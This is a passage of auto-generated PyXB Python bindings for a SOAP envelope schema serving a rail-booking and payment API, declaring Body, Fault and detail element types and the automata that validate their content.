generatePaymentTokenResponse = property(__generatePaymentTokenResponse.value, __generatePaymentTokenResponse.set, None, None)
# Element deletePaymentTokenRequest uses Python identifier deletePaymentTokenRequest
__deletePaymentTokenRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'deletePaymentTokenRequest'), 'deletePaymentTokenRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__deletePaymentTokenRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 69, 12), )
deletePaymentTokenRequest = property(__deletePaymentTokenRequest.value, __deletePaymentTokenRequest.set, None, None)
# Element deletePaymentTokenResponse uses Python identifier deletePaymentTokenResponse
__deletePaymentTokenResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'deletePaymentTokenResponse'), 'deletePaymentTokenResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__deletePaymentTokenResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 70, 12), )
deletePaymentTokenResponse = property(__deletePaymentTokenResponse.value, __deletePaymentTokenResponse.set, None, None)
# Element retrieveCancellationSummaryRequest uses Python identifier retrieveCancellationSummaryRequest
__retrieveCancellationSummaryRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'retrieveCancellationSummaryRequest'), 'retrieveCancellationSummaryRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__retrieveCancellationSummaryRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 71, 12), )
retrieveCancellationSummaryRequest = property(__retrieveCancellationSummaryRequest.value, __retrieveCancellationSummaryRequest.set, None, None)
# Element retrieveCancellationSummaryResponse uses Python identifier retrieveCancellationSummaryResponse
__retrieveCancellationSummaryResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'retrieveCancellationSummaryResponse'), 'retrieveCancellationSummaryResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__retrieveCancellationSummaryResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 72, 12), )
retrieveCancellationSummaryResponse = property(__retrieveCancellationSummaryResponse.value, __retrieveCancellationSummaryResponse.set, None, None)
_AttributeWildcard = pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=pyxb.binding.content.Wildcard.NC_any)
_HasWildcardElement = True
_ElementMap.update({
__pointToPointShoppingRequest.name() : __pointToPointShoppingRequest,
__pointToPointShoppingResponse.name() : __pointToPointShoppingResponse,
__travelPassShoppingRequest.name() : __travelPassShoppingRequest,
__travelPassShoppingResponse.name() : __travelPassShoppingResponse,
__scheduleSearchRequest.name() : __scheduleSearchRequest,
__scheduleSearchResponse.name() : __scheduleSearchResponse,
__addPaymentRequest.name() : __addPaymentRequest,
__addPaymentResponse.name() : __addPaymentResponse,
__authenticatePayerRequest.name() : __authenticatePayerRequest,
__authenticatePayerResponse.name() : __authenticatePayerResponse,
__cancelBookingRecordRequest.name() : __cancelBookingRecordRequest,
__cancelBookingRecordResponse.name() : __cancelBookingRecordResponse,
__claimValueDocumentRequest.name() : __claimValueDocumentRequest,
__claimValueDocumentResponse.name() : __claimValueDocumentResponse,
__confirmBookingRecordRequest.name() : __confirmBookingRecordRequest,
__confirmBookingRecordResponse.name() : __confirmBookingRecordResponse,
__createBookingRecordRequest.name() : __createBookingRecordRequest,
__createBookingRecordResponse.name() : __createBookingRecordResponse,
__recordFinancialTransactionRequest.name() : __recordFinancialTransactionRequest,
__recordFinancialTransactionResponse.name() : __recordFinancialTransactionResponse,
__redeliverValueDocumentRequest.name() : __redeliverValueDocumentRequest,
__redeliverValueDocumentResponse.name() : __redeliverValueDocumentResponse,
__retrieveBookingRecordRequest.name() : __retrieveBookingRecordRequest,
__retrieveBookingRecordResponse.name() : __retrieveBookingRecordResponse,
__returnValueDocumentRequest.name() : __returnValueDocumentRequest,
__returnValueDocumentResponse.name() : __returnValueDocumentResponse,
__searchBookingRecordsRequest.name() : __searchBookingRecordsRequest,
__searchBookingRecordsResponse.name() : __searchBookingRecordsResponse,
__updateBookingRecordRequest.name() : __updateBookingRecordRequest,
__updateBookingRecordResponse.name() : __updateBookingRecordResponse,
__refundBookingRecordRequest.name() : __refundBookingRecordRequest,
__refundBookingRecordResponse.name() : __refundBookingRecordResponse,
__validateBookingRecordInformationRequest.name() : __validateBookingRecordInformationRequest,
__validateBookingRecordInformationResponse.name() : __validateBookingRecordInformationResponse,
__generatePaymentTokenRequest.name() : __generatePaymentTokenRequest,
__generatePaymentTokenResponse.name() : __generatePaymentTokenResponse,
__deletePaymentTokenRequest.name() : __deletePaymentTokenRequest,
__deletePaymentTokenResponse.name() : __deletePaymentTokenResponse,
__retrieveCancellationSummaryRequest.name() : __retrieveCancellationSummaryRequest,
__retrieveCancellationSummaryResponse.name() : __retrieveCancellationSummaryResponse
})
_AttributeMap.update({
})
Namespace.addCategoryObject('typeBinding', 'Body', Body_)
# Complex type {http://schemas.xmlsoap.org/soap/envelope/}Fault with content type ELEMENT_ONLY
class Fault_ (pyxb.binding.basis.complexTypeDefinition):
"""Fault reporting structure"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'Fault')
_XSDLocation = pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 107, 0)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element faultcode uses Python identifier faultcode
__faultcode = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'faultcode'), 'faultcode', '__httpschemas_xmlsoap_orgsoapenvelope_Fault__faultcode', False, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 112, 8), )
faultcode = property(__faultcode.value, __faultcode.set, None, None)
# Element faultstring uses Python identifier faultstring
__faultstring = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'faultstring'), 'faultstring', '__httpschemas_xmlsoap_orgsoapenvelope_Fault__faultstring', False, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 113, 8), )
faultstring = property(__faultstring.value, __faultstring.set, None, None)
# Element faultactor uses Python identifier faultactor
__faultactor = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'faultactor'), 'faultactor', '__httpschemas_xmlsoap_orgsoapenvelope_Fault__faultactor', False, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 114, 8), )
faultactor = property(__faultactor.value, __faultactor.set, None, None)
# Element detail uses Python identifier detail
__detail = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'detail'), 'detail', '__httpschemas_xmlsoap_orgsoapenvelope_Fault__detail', False, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 115, 8), )
detail = property(__detail.value, __detail.set, None, None)
_ElementMap.update({
__faultcode.name() : __faultcode,
__faultstring.name() : __faultstring,
__faultactor.name() : __faultactor,
__detail.name() : __detail
})
_AttributeMap.update({
})
Namespace.addCategoryObject('typeBinding', 'Fault', Fault_)
# Complex type {http://schemas.xmlsoap.org/soap/envelope/}detail with content type ELEMENT_ONLY
class detail (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://schemas.xmlsoap.org/soap/envelope/}detail with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'detail')
_XSDLocation = pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 118, 0)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
_AttributeWildcard = pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=pyxb.binding.content.Wildcard.NC_any)
_HasWildcardElement = True
_ElementMap.update({
})
_AttributeMap.update({
})
Namespace.addCategoryObject('typeBinding', 'detail', detail)
Envelope = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Envelope'), Envelope_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 14, 4))
Namespace.addCategoryObject('elementBinding', Envelope.name().localName(), Envelope)
Header = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Header'), Header_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 23, 4))
Namespace.addCategoryObject('elementBinding', Header.name().localName(), Header)
Body = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Body'), Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 30, 4))
Namespace.addCategoryObject('elementBinding', Body.name().localName(), Body)
Fault = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Fault'), Fault_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 106, 0))
Namespace.addCategoryObject('elementBinding', Fault.name().localName(), Fault)
Envelope_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Header'), Header_, scope=Envelope_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 23, 4)))
Envelope_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Body'), Body_, scope=Envelope_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 30, 4)))
def _BuildAutomaton ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton
del _BuildAutomaton
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 17, 12))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 19, 12))
counters.add(cc_1)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(Envelope_._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Header')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 17, 12))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
symbol = pyxb.binding.content.ElementUse(Envelope_._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Body')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 18, 12))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.WildcardUse(pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=(pyxb.binding.content.Wildcard.NC_not, 'http://schemas.xmlsoap.org/soap/envelope/')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 19, 12))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, True) ]))
st_2._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
Envelope_._Automaton = _BuildAutomaton()
def _BuildAutomaton_ ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_
del _BuildAutomaton_
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 26, 12))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.WildcardUse(pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=(pyxb.binding.content.Wildcard.NC_not, 'http://schemas.xmlsoap.org/soap/envelope/')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 26, 12))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
Header_._Automaton = _BuildAutomaton_()
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'pointToPointShoppingRequest'), _ImportedBinding_silvershop.PointToPointShoppingRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 33, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'pointToPointShoppingResponse'), _ImportedBinding_silvershop.PointToPointShoppingResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 34, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'travelPassShoppingRequest'), _ImportedBinding_silvershop.TravelPassShoppingRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 35, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'travelPassShoppingResponse'), _ImportedBinding_silvershop.TravelPassShoppingResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 36, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'scheduleSearchRequest'), _ImportedBinding_silvershop.ScheduleSearchRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 37, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'scheduleSearchResponse'), _ImportedBinding_silvershop.ScheduleSearchResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 38, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'addPaymentRequest'), _ImportedBinding_silverbook.AddPaymentRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 39, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'addPaymentResponse'), _ImportedBinding_silverbook.AddPaymentResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 40, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'authenticatePayerRequest'), _ImportedBinding_silverbook.AuthenticatePayerRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 41, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'authenticatePayerResponse'), _ImportedBinding_silverbook.AuthenticatePayerResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 42, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'cancelBookingRecordRequest'), _ImportedBinding_silverbook.CancelBookingRecordRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 43, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'cancelBookingRecordResponse'), _ImportedBinding_silverbook.CancelBookingRecordResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 44, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'claimValueDocumentRequest'), _ImportedBinding_silverbook.ClaimValueDocumentRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 45, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'claimValueDocumentResponse'), _ImportedBinding_silverbook.ClaimValueDocumentResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 46, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'confirmBookingRecordRequest'), _ImportedBinding_silverbook.ConfirmBookingRecordRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 47, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'confirmBookingRecordResponse'), _ImportedBinding_silverbook.ConfirmBookingRecordResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 48, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'createBookingRecordRequest'), _ImportedBinding_silverbook.CreateBookingRecordRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 49, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'createBookingRecordResponse'), _ImportedBinding_silverbook.CreateBookingRecordResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 50, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'recordFinancialTransactionRequest'), _ImportedBinding_silverbook.RecordFinancialTransactionRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 51, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'recordFinancialTransactionResponse'), _ImportedBinding_silverbook.RecordFinancialTransactionResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 52, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'redeliverValueDocumentRequest'), _ImportedBinding_silverbook.RedeliverValueDocumentRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 53, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'redeliverValueDocumentResponse'), _ImportedBinding_silverbook.RedeliverValueDocumentResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 54, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'retrieveBookingRecordRequest'), _ImportedBinding_silverbook.RetrieveBookingRecordRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 55, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'retrieveBookingRecordResponse'), _ImportedBinding_silverbook.RetrieveBookingRecordResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 56, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'returnValueDocumentRequest'), _ImportedBinding_silverbook.ReturnValueDocumentRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 57, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'returnValueDocumentResponse'), _ImportedBinding_silverbook.ReturnValueDocumentResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 58, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'searchBookingRecordsRequest'), _ImportedBinding_silverbook.SearchBookingRecordsRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 59, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'searchBookingRecordsResponse'), _ImportedBinding_silverbook.SearchBookingRecordsResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 60, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'updateBookingRecordRequest'), _ImportedBinding_silverbook.UpdateBookingRecordRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 61, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'updateBookingRecordResponse'), _ImportedBinding_silverbook.UpdateBookingRecordResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 62, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'refundBookingRecordRequest'), _ImportedBinding_silverbook.RefundBookingRecordRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 63, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'refundBookingRecordResponse'), _ImportedBinding_silverbook.RefundBookingRecordResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 64, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'validateBookingRecordInformationRequest'), _ImportedBinding_silverbook.ValidateBookingRecordInformationRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 65, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'validateBookingRecordInformationResponse'), _ImportedBinding_silverbook.ValidateBookingRecordInformationResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 66, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'generatePaymentTokenRequest'), _ImportedBinding_silverbook.GeneratePaymentTokenRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 67, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'generatePaymentTokenResponse'), _ImportedBinding_silverbook.GeneratePaymentTokenResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 68, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'deletePaymentTokenRequest'), _ImportedBinding_silverbook.DeletePaymentTokenRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 69, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'deletePaymentTokenResponse'), _ImportedBinding_silverbook.DeletePaymentTokenResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 70, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'retrieveCancellationSummaryRequest'), _ImportedBinding_silverbook.RetrieveCancellationSummaryRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 71, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'retrieveCancellationSummaryResponse'), _ImportedBinding_silverbook.RetrieveCancellationSummaryResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 72, 12)))
def _BuildAutomaton_2 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_2
del _BuildAutomaton_2
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 33, 12))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 34, 12))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 35, 12))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 36, 12))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 37, 12))
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 38, 12))
counters.add(cc_5)
cc_6 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 39, 12))
counters.add(cc_6)
cc_7 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 40, 12))
counters.add(cc_7)
cc_8 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 41, 12))
counters.add(cc_8)
cc_9 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 42, 12))
counters.add(cc_9)
cc_10 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 43, 12))
counters.add(cc_10)
cc_11 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 44, 12))
counters.add(cc_11)
cc_12 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 45, 12))
counters.add(cc_12)
cc_13 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 46, 12))
counters.add(cc_13)
cc_14 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 47, 12))
counters.add(cc_14)
cc_15 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 48, 12))
counters.add(cc_15)
cc_16 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 49, 12))
counters.add(cc_16)
cc_17 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 50, 12))
counters.add(cc_17)
cc_18 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 51, 12))
counters.add(cc_18)
cc_19 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 52, 12))
counters.add(cc_19)
